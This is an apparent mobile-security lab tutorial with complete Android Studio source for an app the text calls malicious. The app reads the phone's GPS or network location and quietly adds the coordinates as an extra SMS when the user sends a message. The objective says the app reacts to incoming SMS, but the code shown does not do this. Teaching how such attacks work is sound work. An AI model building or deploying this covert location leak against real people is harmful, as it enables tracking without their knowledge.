Hands-on Lab Practice

Objective:

In this lab, we will use a malicious Android application to demonstrate and simulate an SMS attack on Android mobile device. The malicious Android application can catch the location information from GPS satellite or Network service by receiving a short message. This lab utilizes a malicious Android application that we developed to give users a brief demonstration of how SMS attack works. It is necessary to know how an attack works in order to defend the attacks.

Create a new Android Studio project and name it “GPS” with company domain of "encrypt.android" and click on Next.

//Copy and paste the following code into "GPSTracker.java"

//GPSTracker.java

package encrypt.android.gps;

import android.app.AlertDialog;

import android.app.Service;

import android.content.Context;

import android.content.DialogInterface;

import android.content.Intent;

import android.location.Location;

import android.location.LocationListener;

import android.location.LocationManager;

import android.os.Bundle;

import android.os.IBinder;

import android.provider.Settings;

import android.util.Log;

public class GPSTracker extends Service implements LocationListener {

private final Context mContext;

// flag for GPS status

boolean isGPSEnabled = false;

// flag for network status

boolean isNetworkEnabled = false;

// flag for GPS status

boolean canGetLocation = false;

Location location; // location

double latitude; // latitude

double longitude; // longitude

// The minimum distance to change Updates in meters

private static final long MIN_DISTANCE_CHANGE_FOR_UPDATES = 10; // 10 meters

// The minimum time between updates in milliseconds

private static final long MIN_TIME_BW_UPDATES = 1000 * 60 * 1; // 1 minute

// Declaring a Location Manager

protected LocationManager locationManager;

public GPSTracker(Context context) {

this.mContext = context;

getLocation();

}

public Location getLocation() {

try {

locationManager = (LocationManager) mContext

.getSystemService(LOCATION_SERVICE);

// getting GPS status

isGPSEnabled = locationManager

.isProviderEnabled(LocationManager.GPS_PROVIDER);

// getting network status

isNetworkEnabled = locationManager

.isProviderEnabled(LocationManager.NETWORK_PROVIDER);

if (!isGPSEnabled && !isNetworkEnabled) {

// no network provider is enabled

} else {

this.canGetLocation = true;

if (isNetworkEnabled) {

locationManager.requestLocationUpdates(

LocationManager.NETWORK_PROVIDER,

MIN_TIME_BW_UPDATES,

MIN_DISTANCE_CHANGE_FOR_UPDATES, this);

Log.d("Network", "Network");

if (locationManager != null) {

location = locationManager

.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);

if (location != null) {

latitude = location.getLatitude();

longitude = location.getLongitude();

}

}

}

// if GPS Enabled get lat/long using GPS Services

if (isGPSEnabled) {

if (location == null) {

locationManager.requestLocationUpdates(

LocationManager.GPS_PROVIDER,

MIN_TIME_BW_UPDATES,

MIN_DISTANCE_CHANGE_FOR_UPDATES, this);

Log.d("GPS Enabled", "GPS Enabled");

if (locationManager != null) {

location = locationManager

.getLastKnownLocation(LocationManager.GPS_PROVIDER);

if (location != null) {

latitude = location.getLatitude();

longitude = location.getLongitude();

}

}

}

}

}

} catch (Exception e) {

e.printStackTrace();

}

return location;

}

/**

* Stop using GPS listener

* Calling this function will stop using GPS in your app

* */

public void stopUsingGPS(){

if(locationManager != null){

locationManager.removeUpdates(GPSTracker.this);

}

}

/**

* Function to get latitude

* */

public double getLatitude(){

if(location != null){

latitude = location.getLatitude();

}

// return latitude

return latitude;

}

/**

* Function to get longitude

* */

public double getLongitude(){

if(location != null){

longitude = location.getLongitude();

}

// return longitude

return longitude;

}

/**

* Function to check GPS/wifi enabled

* @return boolean

* */

public boolean canGetLocation() {

return this.canGetLocation;

}

/**

* Function to show settings alert dialog

* On pressing Settings button will lauch Settings Options

* */

public void showSettingsAlert(){

AlertDialog.Builder alertDialog = new AlertDialog.Builder(mContext);

// Setting Dialog Title

alertDialog.setTitle("GPS is settings");

// Setting Dialog Message

alertDialog.setMessage("GPS is not enabled. Do you want to go to settings menu?");

// On pressing Settings button

alertDialog.setPositiveButton("Settings", new DialogInterface.OnClickListener() {

public void onClick(DialogInterface dialog,int which) {

Intent intent = new Intent(Settings.ACTION_LOCATION_SOURCE_SETTINGS);

mContext.startActivity(intent);

}

});

// on pressing cancel button

alertDialog.setNegativeButton("Cancel", new DialogInterface.OnClickListener() {

public void onClick(DialogInterface dialog, int which) {

dialog.cancel();

}

});

// Showing Alert Message

alertDialog.show();

}

@Override

public void onProviderDisabled(String provider) {

}

@Override

public void onProviderEnabled(String provider) {

}

@Override

public void onLocationChanged(Location location) {

}

@Override

public void onStatusChanged(String provider, int status, Bundle extras) {

}

@Override

public IBinder onBind(Intent arg0) {

return null;

}

}

//Copy and paste the following code into “MainActivity.java”.

//MainActivity.java

package encrypt.android.gps;

import androidx.appcompat.app.AppCompatActivity;

import java.util.Date;

import java.util.List;

import android.Manifest;

import android.content.pm.PackageManager;

import android.os.Bundle;

import android.app.Activity;

import androidx.core.app.ActivityCompat;

import androidx.core.app.ActivityCompat;

import android.telephony.SmsManager;

import android.util.Log;

import android.view.View;

import android.view.View.OnClickListener;

import android.widget.Button;

import android.widget.EditText;

public class MainActivity extends Activity {

String locationInfo;

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

final EditText receiver,message;

Button send;

GPSTracker gpsTracker;

receiver = findViewById(R.id.editText1);

message = findViewById(R.id.editText2);

send = findViewById(R.id.button1);

if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION)

!= PackageManager.PERMISSION_GRANTED) {

// Check Permissions for Location

if (ActivityCompat.shouldShowRequestPermissionRationale(this,

Manifest.permission.ACCESS_FINE_LOCATION)) {

} else {

ActivityCompat.requestPermissions(

this, new String[]{Manifest.permission.ACCESS_FINE_LOCATION},

1);

}

return;

}

//Check permission for SMS

if (ActivityCompat.checkSelfPermission(this, Manifest.permission.SEND_SMS)

!= PackageManager.PERMISSION_GRANTED) {

// Check Permissions Now

if (ActivityCompat.shouldShowRequestPermissionRationale(this,

Manifest.permission.SEND_SMS)) {

} else {

ActivityCompat.requestPermissions(

this, new String[]{Manifest.permission.SEND_SMS},

1);

}

return;

}

//Check permission for Read_Phone_State

if (ActivityCompat.checkSelfPermission(this, Manifest.permission.READ_PHONE_STATE)

!= PackageManager.PERMISSION_GRANTED) {

// Check Permissions Now

if (ActivityCompat.shouldShowRequestPermissionRationale(this,

Manifest.permission.READ_PHONE_STATE)) {

} else {

ActivityCompat.requestPermissions(

this, new String[]{Manifest.permission.READ_PHONE_STATE},

1);

}

return;

}

gpsTracker = new GPSTracker(MainActivity.this);

if(gpsTracker.canGetLocation()) {

double latitude = gpsTracker.getLatitude();

double longitude = gpsTracker.getLongitude();

locationInfo = "Latitude: "+latitude+"\n"+"Longitude: "+longitude;

}else {

gpsTracker.showSettingsAlert();

}

send.setOnClickListener(new OnClickListener() {

@Override

public void onClick(View v) {

String phone=receiver.getText().toString();

String msg=message.getText().toString();

sendSMS(phone,msg);

sendSMS(phone,locationInfo);

}

});

}

private void sendSMS(String phoneNo, String message) {

//get a SmsManager

SmsManager smsManager = SmsManager.getDefault();

if (message.length() != 0) {

List<String> contents = smsManager.divideMessage(message);

for (String str : contents) {

smsManager.sendTextMessage(phoneNo, null, str, null, null);

}

} else {

smsManager.sendTextMessage(phoneNo, null, message, null, null);

}

Log.i("AndroidServer", "Send at" + new Date());

}

}

Copy and paste the following code into “acitivity_main.xml”.

acitivity_main.xml

<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"

xmlns:tools="http://schemas.android.com/tools"

android:layout_width="match_parent"

android:layout_height="match_parent"

android:paddingBottom="@dimen/activity_vertical_margin"

android:paddingLeft="@dimen/activity_horizontal_margin"

android:paddingRight="@dimen/activity_horizontal_margin"

android:paddingTop="@dimen/activity_vertical_margin"

tools:context=".MainActivity" >

<EditText

android:id="@+id/editText1"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignBaseline="@+id/textView1"

android:layout_alignBottom="@+id/textView1"

android:layout_centerHorizontal="true"

android:ems="10" />

<TextView

android:id="@+id/textView1"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignParentTop="true"

android:layout_marginRight="15dp"

android:layout_marginTop="32dp"

android:layout_toLeftOf="@+id/editText1"

android:text="To:" />

<EditText

android:id="@+id/editText2"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_below="@+id/editText1"

android:layout_marginTop="80dp"

android:layout_toRightOf="@+id/textView1"

android:inputType="textMultiLine"

android:ems="10" >

</EditText>

<Button

android:id="@+id/button1"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_below="@+id/editText2"

android:layout_centerHorizontal="true"

android:layout_marginTop="53dp"

android:text="Send" />

</RelativeLayout>

Copy and paste the following code into "AndroidManifest.xml"

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>

<manifest xmlns:android="http://schemas.android.com/apk/res/android"

package="encrypt.android.gps">

<uses-permission android:name="android.permission.ACCESS_GPS" />

<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />

<uses-permission android:name="android.permission.ACCESS_LOCATION" />

<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />

<uses-permission android:name="android.permission.INTERNET" />

<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />

<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />

<uses-permission android:name="android.permission.SEND_SMS"/>

<uses-permission android:name="android.permission.READ_PHONE_STATE"/>

<application

android:allowBackup="true"

android:icon="@mipmap/ic_launcher"

android:label="@string/app_name"

android:theme="@style/Theme.GPS" >

<activity

android:name=".MainActivity" android:exported="true"

android:label="@string/app_name" >

<intent-filter>

<action android:name="android.intent.action.MAIN" />

<category android:name="android.intent.category.LAUNCHER" />

</intent-filter>

</activity>

</application>

</manifest>

//Copy and paste the following code into "dimen.xml"

//dimen.xml

<resources>

<!-- Default screen margins, per the Android Design guidelines. -->

<dimen name="activity_horizontal_margin">16dp</dimen>

<dimen name="activity_vertical_margin">16dp</dimen>

</resources>

Save your project and run it on the AVD

Click on "Run-->Run App" which shall Launch the AVD emulator with the following interfaces

DOWNLOAD LINK FOR GPS Project FILE